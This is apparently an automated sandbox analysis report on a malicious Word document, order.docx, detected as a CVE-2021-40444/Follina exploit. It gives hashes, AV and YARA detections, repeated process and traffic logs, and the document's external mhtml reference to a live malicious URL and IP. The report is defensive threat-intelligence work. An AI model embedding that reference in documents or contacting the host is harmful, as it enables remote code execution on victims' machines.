Windows Analysis Report
order.docx

Overview

General Information

Sample Name:	order.docx
Analysis ID:	676557
MD5:	8abea2d6c14af54c6eac09d158554085
SHA1:	3802d9c8b3530fe7b140cbd4a12c3895c46077b2
SHA256:	aa26ed65b5b05b28fa8c56df8c0d87e6bfd8b98f962824293acce14d03cd3412
Tags:	docdocxFollina
Infos:

Detection

CVE-2021-40444

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected CVE-2021-40444 exploit

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: order.docx

Avira: detected

Multi AV Scanner detection for submitted file

Source: order.docx

ReversingLabs: Detection: 69%

Exploits

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 91.235.116.180:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com
Source: global traffic	DNS query: name: polpharmar.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 91.235.116.180:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: THCPROJECTSRO THCPROJECTSRO

Source: ~WRS{FC65F658-05F2-4F35-9C52-226D776E880F}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html%
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.html%x-usc:http://polpharmar.com/test.html
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	String found in binary or memory: http://polpharmar.com/test.htmlyX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: polpharmar.com

Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test.html HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: polpharmar.comIf-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMTConnection: Keep-Alive

Yara signature match

Source: document.xml.rels, type: SAMPLE	Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: document.xml.rels, type: SAMPLE	Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: order.docx

ReversingLabs: Detection: 69%

Source: order.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\order.docx

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$order.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR74D1.tmp

Jump to behavior

Source: classification engine

Classification label: mal68.expl.evad.winDOCX@1/20@7/1

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: order.docx

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:http://polpharmar.com/test.html!x-usc:http://polpharmar.com/test.html

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.235.116.180	polpharmar.com	Romania		51177	THCPROJECTSRO	true

Contacted Domains

Name	IP	Active
polpharmar.com	91.235.116.180	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://polpharmar.com/test.html	true	Avira URL Cloud: safe	unknown

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD	data	69E01CD5678E2F435A5DA3DD7098792D	CD9B07B23BC125CA6AA49FA9ABF57D19D475F488	4891EF6EBC9EFA8EE67F0B6A02B2C3D4C76D13AF8B23DA56FC5F82F94325EA8D
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BDA067BC-A85F-4D09-B1E2-A27A26259E72}.FSD	data	0F9367D91948664C4F0693A5B2D1F022	87640D1AE4FF977D2262FB54BFC5B84DB76EDFB2	F5B4FDE36B3E368EE7C6E745D715BE2658F830B88C6F411D82C3E16B0BC713B6
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF	data	B3F9E95F032199D9FFC42A0D17DB4430	3B883B7D1150D9832CBC819C1852D96B2FD6FF21	9A45C47B86B253B8AF932AF843250F11E722706F79CDDB7D103971C08E4F8C29
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD	data	12C0319349817D1200BD72928EFF5130	2659A8308AC1006515BFDF4D53B14C9F69F7E102	9C3F839DC9BE9306C246846AFE3ADBBABB4A4D91210176C0B00AC7D7CBAB88D3
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{87FAB0B5-CE0C-4484-80A4-0721760F3A7E}.FSD	data	05B01089293DF5BB27FED11ECA430E6F	92D1D51F3A1262A740E2239D66759BD14F5583DB	8DFBEF5045064D09CC51B199192171E1B147A5404F9EA799B4260F960E56AAC7
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF	data	47E62973D3D4A696C9CB8D121EC7DDAA	43F1A500741C399A6ADC55BC1013BB0F917F2F20	209521C1D97FEA95A89C0C09038668F492955E29CDB45180C891D78B86782AB9
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\test[1].htm	HTML document, ASCII text, with very long lines, with CRLF line terminators	2E15CCD20E7E02ED1F80CB3557FA4E89	B7C97A67705C420A5246E9C9BB39720B4E1B5FC0	78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14683F8F.jpg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2453x3509, frames 3	E8C7DD6A2DED0B1A7C8F5C15FE284802	B93D9DC1405EE585DEC160FD0B0E7F2AF0D269A0	82C2564BFE32D9FCA3B4919AD2FAA4AD8DFCBEC0DD7A1C50C7B1228DD6FF2AB4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51B846.htm	HTML document, ASCII text, with very long lines, with CRLF line terminators	2E15CCD20E7E02ED1F80CB3557FA4E89	B7C97A67705C420A5246E9C9BB39720B4E1B5FC0	78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B00ABF75.htm	HTML document, ASCII text, with very long lines, with CRLF line terminators	2E15CCD20E7E02ED1F80CB3557FA4E89	B7C97A67705C420A5246E9C9BB39720B4E1B5FC0	78FA2ECFD68C8F56EE2BDDD806C0C68FAECA91299C681856EC3AAE59EC9692A0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9F5FB543-D04B-49F9-BFE7-67526990F982}.tmp	Composite Document File V2 Document, Cannot read section info	D164864528BA69AE924554E4638BA1A6	7257FD1CC0A67FCEBAB6E078533460C45AAF3BBA	36072BAE47AEB89D82C4E9AEAC305591853FB3B5FB5F328B41429E1AD583743E
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{45FF0D1D-AF9D-41F4-B5D7-9125F330AE9F}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
